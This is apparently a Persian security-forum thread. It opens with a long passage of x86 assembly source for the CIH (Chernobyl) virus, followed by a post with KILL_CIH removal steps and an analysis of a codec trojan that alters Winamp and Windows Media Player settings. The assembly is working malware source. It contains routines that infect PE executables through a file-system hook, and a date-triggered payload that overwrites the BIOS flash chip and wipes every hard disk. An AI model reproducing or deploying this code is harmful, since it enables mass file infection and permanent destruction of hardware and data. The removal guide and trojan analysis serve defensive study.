            xor    eax, eax
            mov    ah, 0d5h
            xor    ecx, ecx
            xor    edx, edx
            inc    edx
            mov    ebx, edx
            inc    ebx
            call    edi    ; VXDCall IFSMgr_Ring0_FileIO

            xchg    ebx, eax    ; mov ebx, FileHandle

; *************************************
; * Need to Restore                   *
; * Attributes of the File !?         *
; *************************************

            pop    ecx

            pushf

            test    cl, 01h
            jz    IsOpenFileOK

; *************************************
; * Restore Attributes of the File    *
; *************************************

            mov    ax, 4301h
            call    edi    ; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Is Open File OK !?                *
; *************************************

IsOpenFileOK:
            popf

            jc    DisableOnBusy

; *************************************
; * Open File Already Succeed.   ^__^ *
; *************************************

            push    esi    ; Push FileNameBuffer Address to Stack

            pushf        ; Now CF = 0, Push Flag to Stack

            add    esi, DataBuffer-@7 ; mov esi, offset DataBuffer

; ***************************
; * Get OffsetToNewHeader   *
; ***************************

            xor    eax, eax
            mov    ah, 0d6h

            ; For Doing Minimal VirusCode's Length,
            ; I Save EAX to EBP.
            mov    ebp, eax

            push    00000004h
            pop    ecx
            push    0000003ch
            pop    edx
            call    edi    ; VXDCall IFSMgr_Ring0_FileIO

            mov    edx, [esi]

; ***************************
; * Get 'PE\0' Signature    *
; * of ImageFileHeader, and *
; * Infected Mark.          *
; ***************************

            dec    edx

            mov    eax, ebp
            call    edi    ; VXDCall IFSMgr_Ring0_FileIO

; ***************************
; * Is PE !?                *
; ***************************
; * Is the File             *
; * Already Infected !?     *
; ***************************
; * WinZip Self-Extractor   *
; * doesn't Have Infected   *
; * Mark Because My Virus   *
; * doesn't Infect it.      *
; ***************************

            ; cmp [esi], '\0PE\0'
            cmp    dword ptr [esi], 00455000h
            jne    CloseFile

; *************************************
; * The File is                   ^o^ *
; * PE(Portable Executable) indeed.   *
; *************************************
; * The File isn't also Infected.     *
; *************************************

; *************************************
; * Start to Infect the File          *
; *************************************
; * Registers Use Status Now :        *
; *                                   *
; * EAX = 04h                         *
; * EBX = File Handle                 *
; * ECX = 04h                         *
; * EDX = 'PE\0\0' Signature of       *
; *       ImageFileHeader Pointer's   *
; *      Former Byte.                *
; * ESI = DataBuffer Address ==> @8   *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump :                      *
; *                                   *
; * ESP => -------------------------  *
; *        |       EFLAG(CF=0)     |  *
; *        -------------------------  *
; *        | FileNameBufferPointer |  *
; *        -------------------------  *
; *        |          EDI          |  *
; *        -------------------------  *
; *        |          ESI          |  *
; *        -------------------------  *
; *        |          EBP          |  *
; *        -------------------------  *
; *        |          ESP          |  *
; *        -------------------------  *
; *        |          EBX          |  *
; *        -------------------------  *
; *        |          EDX          |  *
; *        -------------------------  *
; *        |          ECX          |  *
; *        -------------------------  *
; *        |          EAX          |  *
; *        -------------------------  *
; *        |     Return Address    |  *
; *        -------------------------  *
; *************************************

            push    ebx    ; Save File Handle

            push    00h    ; Set VirusCodeSectionTableEndMark

; ***************************
; * Let's Set the           *
; * Virus' Infected Mark    *
; ***************************

            push    01h    ; Size
            push    edx    ; Pointer of File
            push    edi    ; Address of Buffer

; ***************************
; * Save ESP Register       *
; ***************************

            mov    dr1, esp

; ***************************
; * Let's Set the           *
; * NewAddressOfEntryPoint  *
; * ( Only First Set Size ) *
; ***************************

            push    eax    ; Size

; ***************************
; * Let's Read              *
; * Image Header in File    *
; ***************************

            mov    eax, ebp
            mov    cl, SizeOfImageHeaderToRead
            add    edx, 07h ; Move EDX to NumberOfSections
            call    edi     ; VXDCall IFSMgr_Ring0_FileIO

; ***************************
; * Let's Set the           *
; * NewAddressOfEntryPoint  *
; * ( Set Pointer of File,  *
; *   Address of Buffer   ) *
; ***************************

            lea    eax, (AddressOfEntryPoint-@8)[edx]
            push    eax    ; Pointer of File

            lea    eax, (NewAddressOfEntryPoint-@8)[esi]
            push    eax    ; Address of Buffer

; ***************************
; * Move EDX to the Start   *
; * of SectionTable in File *
; ***************************

            movzx    eax, word ptr (SizeOfOptionalHeader-@8)[esi]
            lea    edx, [eax+edx+12h]

; ***************************
; * Let's Get               *
; * Total Size of Sections  *
; ***************************

            mov    al, SizeOfScetionTable

            ; I Assume NumberOfSections &lt;= 0ffh
            mov    cl, (NumberOfSections-@8)[esi]

            mul    cl

; ***************************
; * Let's Set Section Table *
; ***************************

            ; Move ESI to the Start of SectionTable
            lea    esi, (StartOfSectionTable-@8)[esi]

            push    eax    ; Size
            push    edx    ; Pointer of File
            push    esi    ; Address of Buffer

; ***************************
; * The Code Size of Merge  *
; * Virus Code Section and  *
; * Total Size of Virus     *
; * Code Section Table Must *
; * be Small or Equal the   *
; * Unused Space Size of    *
; * Following Section Table *
; ***************************

            inc    ecx
            push    ecx    ; Save NumberOfSections+1

            shl    ecx, 03h
            push    ecx    ; Save TotalSizeOfVirusCodeSectionTable

            add    ecx, eax
            add    ecx, edx

            sub    ecx, (SizeOfHeaders-@9)[esi]
            not    ecx
            inc    ecx

            ; Save My Virus First Section Code
            ; Size of Following Section Table...
            ; ( Not Include the Size of Virus Code Section Table )
            push    ecx

            xchg    ecx, eax    ; ECX = Size of Section Table

            ; Save Original Address of Entry Point
            mov    eax, (AddressOfEntryPoint-@9)[esi]
            add    eax, (ImageBase-@9)[esi]
            mov    (OriginalAddressOfEntryPoint-@9)[esi], eax

            cmp    word ptr [esp], small CodeSizeOfMergeVirusCodeSection
            jl    OnlySetInfectedMark

; ***************************
; * Read All Section Tables *
; ***************************

            mov    eax, ebp
            call    edi    ; VXDCall IFSMgr_Ring0_FileIO

; ***************************
; * Full Modify the Bug :   *
; * WinZip Self-Extractor   *
; * Occurs Error...         *
; ***************************
; * So When User Opens      *
; * WinZip Self-Extractor,  *
; * Virus Doesn't Infect it.*
; ***************************
; * First, Virus Gets the   *
; * PointerToRawData in the *
; * Second Section Table,   *
; * Reads the Section Data, *
; * and Tests the String of *
; * 'WinZip(R)'......       *
; ***************************

            xchg    eax, ebp

            push    00000004h
            pop    ecx

            push    edx
            mov    edx, (SizeOfScetionTable+PointerToRawData-@9)[esi]
            add    edx, 12h

            call    edi    ; VXDCall IFSMgr_Ring0_FileIO

            ; cmp [esi], 'nZip'
            cmp    dword ptr [esi], 'piZn'
            je    NotSetInfectedMark

            pop    edx

; ***************************
; * Let's Set Total Virus   *
; * Code Section Table      *
; ***************************

            ; EBX = My Virus First Section Code
            ;    Size of Following Section Table
            pop    ebx
            pop    edi    ; EDI = TotalSizeOfVirusCodeSectionTable
            pop    ecx    ; ECX = NumberOfSections+1

            push    edi        ; Size

            add    edx, ebp
            push    edx        ; Pointer of File

            add    ebp, esi
            push    ebp        ; Address of Buffer

; ***************************
; * Set the First Virus     *
; * Code Section Size in    *
; * VirusCodeSectionTable   *
; ***************************

            lea    eax, [ebp+edi-04h]
            mov    [eax], ebx

; ***************************
; * Let's Set My Virus      *
; * First Section Code      *
; ***************************

            push    ebx    ; Size

            add    edx, edi
            push    edx    ; Pointer of File

            lea    edi, (MyVirusStart-@9)[esi]
            push    edi    ; Address of Buffer

; ***************************
; * Let's Modify the        *
; * AddressOfEntryPoint to  *
; * My Virus Entry Point    *
; ***************************

            mov    (NewAddressOfEntryPoint-@9)[esi], edx

; ***************************
; * Setup Initial Data      *
; ***************************

            lea    edx, [esi-SizeOfScetionTable]
            mov    ebp, offset VirusSize

            jmp    StartToWriteCodeToSections

; ***************************
; * Write Code to Sections  *
; ***************************

LoopOfWriteCodeToSections:

            add    edx, SizeOfScetionTable

            mov    ebx, (SizeOfRawData-@9)[edx]
            sub    ebx, (VirtualSize-@9)[edx]
            jbe    EndOfWriteCodeToSections

            push    ebx    ; Size

            sub    eax, 08h
            mov    [eax], ebx

            mov    ebx, (PointerToRawData-@9)[edx]
            add    ebx, (VirtualSize-@9)[edx]
            push    ebx    ; Pointer of File

            push    edi    ; Address of Buffer

            mov    ebx, (VirtualSize-@9)[edx]
            add    ebx, (VirtualAddress-@9)[edx]
            add    ebx, (ImageBase-@9)[esi]
            mov    [eax+4], ebx

            mov    ebx, [eax]
            add    (VirtualSize-@9)[edx], ebx

            ; Section contains initialized data ==> 00000040h
            ; Section can be Read.              ==> 40000000h
            or    (Characteristics-@9)[edx], 40000040h

StartToWriteCodeToSections:

            sub    ebp, ebx
            jbe    SetVirusCodeSectionTableEndMark

            add    edi, ebx    ; Move Address of Buffer

EndOfWriteCodeToSections:

            loop    LoopOfWriteCodeToSections

; ***************************
; * Only Set Infected Mark  *
; ***************************

OnlySetInfectedMark:
            mov    esp, dr1

            jmp    WriteVirusCodeToFile

; ***************************
; * Not Set Infected Mark   *
; ***************************

NotSetInfectedMark:
            add    esp, 3ch

            jmp    CloseFile

; ***************************
; * Set Virus Code          *
; * Section Table End Mark  *
; ***************************

SetVirusCodeSectionTableEndMark:

            ; Adjust Size of Virus Section Code to Correct Value
            add    [eax], ebp
            add    [esp+08h], ebp

            ; Set End Mark
            xor    ebx, ebx
            mov    [eax-04h], ebx

; ***************************
; * When VirusGame Calls    *
; * VxDCall, VMM Modifies   *
; * the 'int 20h' and the   *
; * 'Service Identifier'    *
; * to 'Call [XXXXXXXX]'.   *
; ***************************
; * Before Writing My Virus *
; * to File, I Must Restore *
; * them First.     ^__^    *
; ***************************

            lea    eax, (LastVxDCallAddress-2-@9)[esi]

            mov    cl, VxDCallTableSize

LoopOfRestoreVxDCallID:
            mov    word ptr [eax], 20cdh

            mov    edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]
            mov    [eax+2], edx

            movzx    edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi]
            sub    eax, edx

            loop    LoopOfRestoreVxDCallID

; ***************************
; * Let's Write             *
; * Virus Code to the File  *
; ***************************

WriteVirusCodeToFile:
            mov    eax, dr1
            mov    ebx, [eax+10h]
            mov    edi, [eax]

LoopOfWriteVirusCodeToFile:

            pop    ecx
            jecxz    SetFileModificationMark

            mov    esi, ecx
            mov    eax, 0d601h
            pop    edx
            pop    ecx

            call    edi    ; VXDCall IFSMgr_Ring0_FileIO

            jmp    LoopOfWriteVirusCodeToFile

; ***************************
; * Let's Set CF = 1 ==>    *
; * Need to Restore File    *
; * Modification Time       *
; ***************************

SetFileModificationMark:
            pop    ebx
            pop    eax

            stc        ; Enable CF(Carry Flag)
            pushf

; *************************************
; * Close File                        *
; *************************************

CloseFile:
            xor    eax, eax
            mov    ah, 0d7h
            call    edi    ; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Need to Restore File Modification *
; * Time !?                           *
; *************************************

            popf
            pop    esi
            jnc    IsKillComputer

; *************************************
; * Restore File Modification Time    *
; *************************************

            mov    ebx, edi

            mov    ax, 4303h
            mov    ecx, (FileModificationTime-@7)[esi]
            mov    edi, (FileModificationTime+2-@7)[esi]
            call    ebx    ; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Disable OnBusy                    *
; *************************************

DisableOnBusy:
            dec    byte ptr (OnBusy-@7)[esi]    ; Disable OnBusy

; *************************************
; * Call Previous FileSystemApiHook   *
; *************************************

prevhook:
            popad

            mov    eax, dr0    ;
            jmp    [eax]        ; Jump to prevhook

; *************************************
; * Call the Function that the IFS    *
; * Manager Would Normally Call to    *
; * Implement this Particular I/O     *
; * Request.                          *
; *************************************

pIFSFunc:
            mov    ebx, esp
            push    dword ptr [ebx+20h+04h+14h]    ; Push pioreq
            call    [ebx+20h+04h]            ; Call pIFSFunc
            pop    ecx                ;

            mov    [ebx+1ch], eax    ; Modify EAX Value in Stack

; ***************************
; * After Calling pIFSFunc, *
; * Get Some Data from the  *
; * Returned pioreq.        *
; ***************************

            cmp    dword ptr [ebx+20h+04h+04h], 00000024h
            jne    QuitMyVirusFileSystemHook

; *****************
; * Get the File  *
; * Modification  *
; * Date and Time *
; * in DOS Format.*
; *****************

            mov    eax, [ecx+28h]
            mov    (FileModificationTime-@6)[esi], eax

; ***************************
; * Quit My Virus'          *
; * IFSMgr_FileSystemHook   *
; ***************************

QuitMyVirusFileSystemHook:

            popad

            ret

; *************************************
; * Kill Computer !? ...   *^_^*      *
; *************************************

IsKillComputer:
            ; Get Now Day from BIOS CMOS
            mov    al, 07h
            out    70h, al
            in    al, 71h

            xor    al, 26h    ; ??/26/????

IF    DEBUG
            jmp    DisableOnBusy
ELSE
            jnz    DisableOnBusy
ENDIF

; **************************************
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; **************************************

; ***************************
; * Kill BIOS EEPROM        *
; ***************************

            mov    bp, 0cf8h
            lea    esi, IOForEEPROM-@7[esi]

; ***********************
; * Show BIOS Page in   *
; * 000E0000 - 000EFFFF *
; *    (   64 KB   )    *
; ***********************

            mov    edi, 8000384ch
            mov    dx, 0cfeh
            cli
            call    esi

; ***********************
; * Show BIOS Page in   *
; * 000F0000 - 000FFFFF *
; *    (   64 KB   )    *
; ***********************

            mov    di, 0058h
            dec    edx                    ; and al,0fh
            mov    word ptr (BooleanCalculateCode-@10)[esi], 0f24h
            call    esi

; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory  *
; * 000E0000 - 000E01FF *
; *   (   512 Bytes   ) *
; * , and the Section   *
; * of Extra BIOS can   *
; * be Writted...       *
; ***********************

            lea    ebx, EnableEEPROMToWrite-@10[esi]

            mov    eax, 0e5555h
            mov    ecx, 0e2aaah
            call    ebx
            mov    byte ptr [eax], 60h

            push    ecx
            loop    $

; ***********************
; * Kill the BIOS Extra *
; * ROM Data in Memory  *
; * 000E0000 - 000E007F *
; *   (   80h Bytes   ) *
; ***********************

            xor    ah, ah
            mov    [eax], al

            xchg    ecx, eax
            loop    $

; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data  *
; * 000E0000 - 000FFFFF *
; *   (   128 KB   )    *
; * can be Writted...   *
; ***********************

            mov    eax, 0f5555h
            pop    ecx
            mov    ch, 0aah
            call    ebx
            mov    byte ptr [eax], 20h

            loop    $

; ***********************
; * Kill the BIOS Main  *
; * ROM Data in Memory  *
; * 000FE000 - 000FE07F *
; *   (   80h Bytes   ) *
; ***********************

            mov    ah, 0e0h
            mov    [eax], al

; ***********************
; * Hide BIOS Page in   *
; * 000F0000 - 000FFFFF *
; *    (   64 KB   )    *
; ***********************
                                    ; or al,10h
            mov    word ptr (BooleanCalculateCode-@10)[esi], 100ch
            call    esi

; ***************************
; * Kill All HardDisk       *
; ***************************************************
; * IOR Structure of IOS_SendCommand Needs          *
; ***************************************************
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
; ***************************************************

KillHardDisk:
            xor    ebx, ebx
            mov    bh, FirstKillHardDiskNumber
            push    ebx
            sub    esp, 2ch
            push    0c0001000h
            mov    bh, 08h
            push    ebx
            push    ecx
            push    ecx
            push    ecx
            push    40000501h
            inc    ecx
            push    ecx
            push    ecx

            mov    esi, esp
            sub    esp, 0ach

LoopOfKillHardDisk:
            int    20h
            dd    00100004h    ; VXDCall IOS_SendCommand

            cmp    word ptr [esi+06h], 0017h
            je    KillNextDataSection

ChangeNextHardDisk:
            inc    byte ptr [esi+4dh]

            jmp    LoopOfKillHardDisk

KillNextDataSection:
            add    dword ptr [esi+10h], ebx
            mov    byte ptr [esi+4dh], FirstKillHardDiskNumber

            jmp    LoopOfKillHardDisk

; ***************************
; * Enable EEPROM to Write  *
; ***************************

EnableEEPROMToWrite:
            mov    [eax], cl
            mov    [ecx], al
            mov    byte ptr [eax], 80h
            mov    [eax], cl
            mov    [ecx], al

            ret

; ***************************
; * IO for EEPROM           *
; ***************************

IOForEEPROM:
@10            =    IOForEEPROM

            xchg    eax, edi
            xchg    edx, ebp
            out    dx, eax

            xchg    eax, edi
            xchg    edx, ebp
            in    al, dx

BooleanCalculateCode    =    $
            or    al, 44h

            xchg    eax, edi
            xchg    edx, ebp
            out    dx, eax

            xchg    eax, edi
            xchg    edx, ebp
            out    dx, al

            ret

; *********************************************************
; *            Static Data                       *
; *********************************************************

LastVxDCallAddress    =    IFSMgr_Ring0_FileIO
VxDCallAddressTable    db    00h
            db    IFSMgr_RemoveFileSystemApiHook-_PageAllocate
            db    UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
            db    IFSMgr_Ring0_FileIO-UniToBCSPath

VxDCallIDTable        dd    00010053h, 00400068h, 00400041h, 00400032h
VxDCallTableSize    =    ($-VxDCallIDTable)/04h

; *********************************************************
; *                Virus Version Copyright                *
; *********************************************************

VirusVersionCopyright    db    'CIH v'
            db    MajorVirusVersion+'0'
            db    '.'
            db    MinorVirusVersion+'0'
            db    ' TATUNG'

; *********************************************************
; *            Virus Size                        *
; *********************************************************

VirusSize            =    $
;                + SizeOfVirusCodeSectionTableEndMark(04h)
;                + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
;                + SizeOfTheFirstVirusCodeSectionTable(04h)

; *********************************************************
; *            Dynamic Data                      *
; *********************************************************

VirusGameDataStartAddress    =    VirusSize
@6                =    VirusGameDataStartAddress
OnBusy                db    0
FileModificationTime        dd    ?

FileNameBuffer        db    FileNameBufferSize dup(?)
@7            =    FileNameBuffer

DataBuffer        =    $
@8            =    DataBuffer
NumberOfSections    dw    ?
TimeDateStamp        dd    ?
SymbolsPointer        dd    ?
NumberOfSymbols        dd    ?
SizeOfOptionalHeader    dw    ?
_Characteristics    dw    ?
Magic            dw    ?
LinkerVersion        dw    ?
SizeOfCode        dd    ?
SizeOfInitializedData    dd    ?
SizeOfUninitializedData    dd    ?
AddressOfEntryPoint    dd    ?
BaseOfCode        dd    ?
BaseOfData        dd    ?
ImageBase        dd    ?
@9            =    $
SectionAlignment    dd    ?
FileAlignment        dd    ?
OperatingSystemVersion    dd    ?
ImageVersion        dd    ?
SubsystemVersion    dd    ?
Reserved        dd    ?
SizeOfImage        dd    ?
SizeOfHeaders        dd    ?
SizeOfImageHeaderToRead        =    $-NumberOfSections

NewAddressOfEntryPoint    =    DataBuffer    ; DWORD
SizeOfImageHeaderToWrite    =    04h

StartOfSectionTable    =    @9
SectionName        =    StartOfSectionTable    ; QWORD
VirtualSize        =    StartOfSectionTable+08h    ; DWORD
VirtualAddress        =    StartOfSectionTable+0ch    ; DWORD
SizeOfRawData        =    StartOfSectionTable+10h    ; DWORD
PointerToRawData    =    StartOfSectionTable+14h    ; DWORD
PointerToRelocations    =    StartOfSectionTable+18h    ; DWORD
PointerToLineNumbers    =    StartOfSectionTable+1ch    ; DWORD
NumberOfRelocations    =    StartOfSectionTable+20h    ; WORD
NumberOfLinenNmbers    =    StartOfSectionTable+22h    ; WORD
Characteristics        =    StartOfSectionTable+24h    ; DWORD
SizeOfScetionTable    =    Characteristics+04h-SectionName

; *********************************************************
; *        Virus Total Need Memory                   *
; *********************************************************

VirusNeedBaseMemory    =    $

VirusTotalNeedMemory    =    @9
;                + NumberOfSections(??)*SizeOfScetionTable(28h)
;                + SizeOfVirusCodeSectionTableEndMark(04h)
;                + NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
;                + SizeOfTheFirstVirusCodeSectionTable(04h)

; *********************************************************
; *********************************************************

VirusGame               ENDS

                        END     FileHeader__________________

;Www.IrIsT.Ir    &    Www.IrIsT.Ir/forum/


==================================================
طراحی وب سایت
پروژه های برنامه نویسی تجاری
دانلود پروژه های ASP.NET وب سایتهای آماده به همراه توضیحات
دانلود پروژه های سی شارپ و پایگاه داده SQL Server همراه توضیحات و مستندات
دانلود پروژه های UML نمودار Usecase نمودار class نمودرا activity نمودار state chart نمودار DFD و . . .
دانلود پروژه های حرفه ای پایگاه داده SQL Server به همراه مستندات و توضیحات
پروژه های حرفه ای پایگاه داده Microsoft access به همراه مستندات و توضیحات
دانلود پروژه های کارآفرینی
دانلود گزارشهای کارآموزی کارورزی تمامی رشته های دانشگاهی
قالب تمپلیت های آماده وب سایت ASP.NET به همراه Master page و دیتابیس
برنامه های ایجاد گالری عکس آنلاین با ASP.NET و JQuery و اسلایدشو به همراه کد و دیتابیس SQL کاملا Open Source واکنشگرا و ساده به همراه پایگاه داده
==================================================
یافتن تمامی ارسال‌های این کاربر
نقل قول این ارسال در یک پاسخ
06-05-2017, 10:10 AM
ارسال: #25
RE: ساختار ویروسها و برنامه های مخرب کامپیوتری
4-6-روش پاک سازی ویروس CIH
كشف شده: 5ژانويه 1999
آپديت شده: 24آگوست 2005
نوع: اطلاعات Removal
از 3آگوست 1998،ابزار KILL_CIH به طور مناسب براي نمايان كردن و حذف همه انواع شناخته شده ويروس CIH از حافظه تحت ويندوز 95 و ويندوز 98 طراحي شده است.
ويروس CIH روي ويندوز NT و ويندوز 2000 نمي تواند اثر بگذارد.
اگر ابزار قبل از اثر ويروس روي سيستم اجرا شودحافظه كامپيوتر را براي جلوگيري از اثر گذاري ويروس CIH تا زمان reboot بعدي سيستم مايه كوبي خواهد كرد.
يادداشت:
اگر كامپيوتر شما در حال حاضر با ويروس CIH آلوده شده باشد،اول ابزار KILL_CIH را Run كنيد قبل ازاینکه اقدام كنيد به اپدیت كردن تعاريف ويروس يا Scan سيستم تان.
اگر شما اقدام كنيد به Scan كردن سيستم تان با هر فرآورده آنتي ويروس بدون اينكه اول اين ابزار را اجرا كنيد.آلودگي مي تواند گسترش يابد.
بعد از استفاده كردن از اين ابزار، شما مي توانيد به طور مناسب تعاريف آنتي ويروس نورتون تان را updateكنيد و كامپيوتر را scan كنيد.
ابزار KILL_CIH ويروس را از فايل ها حذف نمي كند، آنها تنها ويروس را در حافظه نا توان مي كنند.
شما مي توانيد ابزار حذفCIH از هر DOS command Line يا از يك login script اجرا كنيد.اجرا كردن ابزار از تا login script به administrator اجازه مي دهد كه به طور خودكار، پروسه ها را ضد عفوني كند.
اين بدان معني است كه يك administrator مجبور نيست كه به هر ايستگاه كاري روي شبكه برود و از يك فلاپي ديسك تميز براي تميز كردن كامپيوتر reboot كند.
بعد از استفاده از اين ابزار شما بايد تعاريف ويروس تان را اپدیت كنيد آنگاه به طور كامل كامپيوتر را با استفاده از Scan,NAV كنيد.اين محصول ويروس را حذف خواهد كرد و هر فايل خراب را تعمير ميكند.
بدست آوردن و اجرا كردن ابزار:
فايل KILL_CIH.EXE را در دسک تاپ دانلود كنيد.
همه برنامه ها را قبل از اجرا كردن ابزار ببنديد.
KILL_CIH.EXE را در پنجره DOC درون ويندوز به صورت زير اجرا كنيد.
روي Start كليك كنيدوآنگاه روي Run كليك كنيد.
Command را تايپ كنيدوآنگاه روي Ok كليك كنيد.
يك MS-Dos windows ، يك C:\windows\Desktop prompt را باز خواهد كرد.
KILL_CIH.EXE را تايپ كنيد و انگاه Enter را فشار دهيد.
برنامه KILL_CIH.EXE به آرگومان هاي command _line نياز ندارد.آن يكي از چند پيغام زير را نمايش خواهد داد.
“ويروس w95.CIH در حافظه پيدا شده است.
ويروس W95.CIH به طور كامل نا توان شده است “.
شما مي توانيد آنتي ويروس نورتون را براي حذف هر آلودگي از فايل RUN كنيد.
اگر هر strain از ويروس CIH پيدا شود در حافظه كامپيوتر اين پيغام نمايش داده مي شود.
اين ابزار ويروس را در حافظه نا توان كرده و از اينكه خسارت به سيستم وارد شود و فايل هاي ديگر آلوده شود جلوگيري مي كند.
“ويروس CIH در حافظه پيدا نشده است”
اين پيغام اگر هر strain از ويروس CIH پيدا نشود نمايش داده مي شود.
اين ابزار كامپيوتر را مايه كوبي كرده و از اثر كردن ويروس در حافظه جلوگيري مي كند.
"ويندوز NT نمي تواند به وسيله ويروس CIH آلوده شود."
اين پيغام اگر ابزار تحت ويندوز 2000/XP/NT استفاده شود، نمايش داده مي شود.در انجام دادن اين كار آسيبي متوجه سيستم نيست و برنامه به طور نرمال بعد از نمايش دادن اين پيغام خارج خواهد شد.
بعد از اجرا كردن ابزار:
Live update را Run كنيد تا شما مطمئن شويد كه تعاريف ويروس را داريد.
NAVرا اغاز کنیدو مطمئن شويد كه آن براي اسكن كردن همه فايل ها تركيب بندي شده است.
براي Remove كردن ويروس يكي از كارها انجام دهيد.
• از Symantec Security Respond استفاده كنيد كه ويروس را از حافظه حذف مي كند و از نياز به دوباره راه اندازي كردن از يك سيستم ديسك تميز جلوگيري مي كند.
• كامپيوتر را از Rescue Disk دوباره راه اندازي كنيد.
• اگر كامپيوتر شما اين option را اجازه ميدهد كامپيوتر را از آنتي ويروس نورتون دوباره راه اندازي كنيد.

فصل پنجم-آناليز Get codec multi media Trojan
5-1-بررسی تروجان
جديدا تروجان جديدي شيوع پيدا كرد كه فايل هاي مولتی مديا را در PC ها به صورت بدخيم آلوده ميكند.قابليت جاسازي كد آن بر پايه فرمت ASF (فرمت سيستم هاي پيشرفته است(.
ASF فرمت حامل ويديويي ديجيتال / ديجيتال شنيداري اختصاصي مايكروسافت است كه بويژه براي رسانه هاي در حال جريان معني مي دهد. ASF بخشي از چارچوب رسانه ويندوز است. اين فرمت مشخص نمي كند كه چگونه(يا با چه رمز گذاري)ويدیوياآديو بايد رمز گذاري شود و فقط ساختار جريان ويديو /آديو را مشخص مي كند.اين شبيه عملكرد QuickTime, AVIيا Ogg است. يكي از موارد ASF پشتيباني از سرورهاي رسانه ديجيتال،سرورهاي HTTPوابزار ذخيره محلي مثل درايوهاي هارد ديسك است.
متداولترين نوع فايل ها در فايلASF،windows media audio (WMA) و windows media video (WMV)است.
اين بخش گرايش به آناليز مهندسي معكوس عناصر كليدي نمونه دارد.
اجازه دهيد نگاهي به مسيراصلی داشته باشيم.

مسير اين نمونه
همانطور كه در شكل مي بينيم پس از مقداردهي موفق مجموعه برنامه هاي COM اين تروجان سعي در اجراي مسير هاي زير دارد:
Initialization_and _BasicCheck
Set_Mutex
Modify_Winamp_Conf
Modify_Wmp_Conf
Search-and _Infection_Mechanism

5-2-مسير مقدار دهي و بررسي پايه
این تروجان از این عملکرد برای مقداردهی متغیرهای این کلاس و بررسی چیزی که این در گذشته اجرا كرده است استفاده مي كند. براي انجام اين بررسي كليد ثبتي زير باز شده است:
HKEY_CURRENTt_USER\SOFTWARE\Microsoft\PIMSRV
5-3-مسير Set_Mutex (تنظيم تحريف)
اين تروجان از اين تابع براي كنترل شمارش نمونه های خود استفاده مي كند،و اين كار با استفاده از يك تحريف انجام مي شود كه تضمين مي كند فقط يك نمونه در حال اجراست.
5-4-مسيرModify_Winamp_Conf
پس از اين،تروجان سعي در تغییر دادن فايل تركيب winamp مي كند.
بويژه اين سعي در تغییر تنظيمات زير دارد.
-defext: اين محيط تعريف ميكند كه پسوند پيش فرض وقتي كه winamp فايلي را با پسوند نا مشخص اجرا مي كند چيست ؟ با اين پيش فرض اين پارامتر در MP3 تنظيم مي شود.
- extlist_aac : هيچ اطلاعاتي درباره اين ويژگي يافت نشده است

فايل تركيب winampتغییرداده شده

5-5 -مسير Modify _Wmp_Conf
هدف بعدي اين نمونه برتري هاي مديا پلير ويندوز است كه كليد ثبتي زير را ايجاد مي كند :
HKCU\Software\Microsoft\Media player\Player\Extension \mp3
بطور متوالي تنظيمات URL And Exit Commands Enabled ويندوز مديا پلير تغيير مي كند.وقتي صاحب محتوا يك جريان شنيداري يا ويديو ايجاد مي كند،مي تواند دستوراتScript را نيز اضافه كند (مثل دستورات URL Script و دستوراتCustom Script).هنگامیکه جریان باز نواخته میشود،دستوراتScript می توانند وب بروزر تان را شروع و سپس به يك صفحه وب خاص متصل شوند.مشخصه تغییر داده شده توسط اين Malware پاسخگوي خاموش وروشن شدن فرمانهای scriptدر فایل های ASF است و در يك پيش فرض شده است، به اين معني كه اگر مقدار ثبتیURLAndExitCommandsEnabled وجود نداشته باشد،اين قابليت فعال شده است.
متذكر شديم كه توليد كننده اين malware مقدار URL And Exit Command Enabled را در صفر تنظيم كرده است..در عوض دستورات فايل آغازگر URL And Exit را در فايل هاي ASF خاموش كرده است و اين نمونه را از دانلود هرگونه تروجان ديگري كه از اين روش استفاده كند،غير فعال كرده است. برخي فكر مي كنند اين در نتيجه عدم توضيح سند سازي انجام شده است،توليد كننده ونویسنده اين مقاله شخصا بر اين باور است كه اين براي هدفي انجام شده است.اين موضوع حمله را پنهاني مي كند،از اين رو به عنوان حيله اي در پنهان كردن حمله از قرباني استفاده شده است.
اگر اين كار انجام نشود قرباني خواهد ديد که پس از اجراي تروجان بسياري از اين فايل هاي مولتي مديا پيام هاي نصب كد گذاري نا شناسي را بهنگام باز كردن آنها نمايش مي دهند و وي باور مي كند كه تروجان باعث اين كار شده است. بايد به ياد داشته باشيم كه اين تروجان از طريق صفحات شكاف خورده گسترش پيدا كرده است،از اين رو قرباني فكر مي كند كه اين شكاف معيوب ديگري است.
